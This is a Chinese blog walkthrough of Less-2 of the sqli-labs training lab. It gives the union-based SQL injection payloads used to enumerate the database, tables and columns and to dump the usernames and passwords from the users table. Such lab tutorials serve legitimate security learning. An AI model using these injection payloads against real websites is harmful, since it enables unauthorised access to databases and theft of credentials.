备案控制台
开发者社区 安全 文章 正文

sqli-lab教程Less-2

2024-01-25 26
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: sqli-lab教程Less-2

less-2

sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。


学习sqli注入必备语句:

查库:select schema_name from information_schema.schemata


查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)


查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)


查字段的值:select username,password from security.users(此处拿username,password字段为例)


1.加单引号看出,此处是整形注入


2.使用order by语句判断列数,3列回显正确,说明有三列


3.使用union select联合查询,把id改成一个不存在的值使得有回显位

?id=-1 union select 1,2,3



4.进行爆库操作

?id=-1 union select 1,2,database()



5.进行爆表操作

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'


group_concat:将所有的数据连接进行拼接后作为一行显示


where:指定库的位置


6.进行爆字段操作

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'



7.进行爆字段值操作

?id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from security.users


concat_ws(’~’,A,B)


显示为(A~B),用于区分用户名、密码


注入完成! 这是方法之一,后期会出sqlmap工具等教程…
文章标签:
安全
数据安全/隐私保护
Brucye
目录
相关文章
Brucye
|
1月前
|
关系型数据库 MySQL Shell
sqli-lab教程Less-7
sqli-lab教程Less-7
Brucye
37 0
Brucye
|
1月前
|
安全 数据安全/隐私保护
sqli-lab教程Less-4
sqli-lab教程Less-4
Brucye
21 0
Brucye
|
1月前
|
安全
sqli-lab教程Less-9
sqli-lab教程Less-9
Brucye
36 0
算精通
|
1月前
|
计算机视觉
Lab
Lab
算精通
20 1
MAX。
|
1月前
|
Java
SDUT lab 1.3
SDUT lab 1.3
MAX。
26 0
MAX。
|
1月前
|
Java
sdut lab1.4
sdut lab1.4
MAX。
24 0
MAX。
|
1月前
SDUT lab5-2
SDUT lab5-2
MAX。
20 0
MAX。
|
1月前
|
存储 Java 数据安全/隐私保护
sdut lava lab7.5
sdut lava lab7.5
MAX。
23 0
Brucye
|
1月前
|
安全 数据安全/隐私保护
sqli-lab教程Less-6
sqli-lab教程Less-6
Brucye
42 0
ty_xiumud
|
监控 流计算
dc_labs--lab1的学习与总结
本节为dc_labs系列的第一篇,主要根据自己对于lab的理解,简述实验的过程,同时对于笔者自己觉得需要进一步理解的进行总结学习。本节重点在于理解启动文件与DC的综合流程。建议与对应博文([DC学习笔记正式篇之零——综述与基本流程介绍](https://guodongblog.com/posts/80912d01b675/))进行结合起来进行学习。该文为对应部分的实践篇的内容。本系列博文不会只是带着进行实验内容,个人觉得单纯跑一遍实验意义不大。会结合自己学习的理解进行部分展开。有问题欢迎留言一起学习。
ty_xiumud
761 0